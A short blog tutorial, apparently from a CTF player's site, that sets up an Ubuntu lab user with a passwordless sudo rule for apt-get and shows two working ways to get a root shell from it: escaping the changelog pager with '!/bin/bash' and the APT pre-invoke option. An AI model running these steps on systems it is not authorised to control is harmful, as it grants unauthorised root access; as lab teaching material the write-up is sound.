apt-get Privilege Escalation Linux

How to exploit sudoers entry apt-get command Sudo Privilege Escalation

I add a user hacker for testing and id command to check hacker user group-id and user-id and check our new user for sudo command with sudo su and see the error is user hacker is not allowed to execute /bin/bash as root

sudo su: mean change current user to superuser like root

id
sudo su
apt-get  Privilege Escalation

Now our first Step is Lab Setup for SUOD Right Privilege Escalation I am using ubuntu 16.0 version

Now open your sudoers file this command for adding our user sudoers file

sudo visudo

After opening the sudoers file I am adding our user hacker for apt-get command with no password

apt-get: aptget is a command-line tool which helps in handling packages in Linux and installs a new package and removes old package

hacker ALL=(root) NOPASSWD: /usr/bin/apt-get 

And save the file

And execute a command for check sudoers file entry sudo -l

sudo -l

After the sudo -l command we see /usr/bin/apt is run as root without a password two way to Privilege escalation apt-get command

Privilege Escalation apt-get

changelog: mean Download and display the changelog for the given package

sudo apt-get changelog apt

After opening the changelog file now execute the bash shell the command: !/bin/bash and Enter

!/bin/bash

and normal user hacker shell is changed to superuser root check with id command

id

The second way to Privilege Escalation apt-get command

sudo apt-get update -o APT::update::pre-invoke::=/bin/bash

And again we got a root shell

Perl python privilege escalation here read more privilege escalation link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →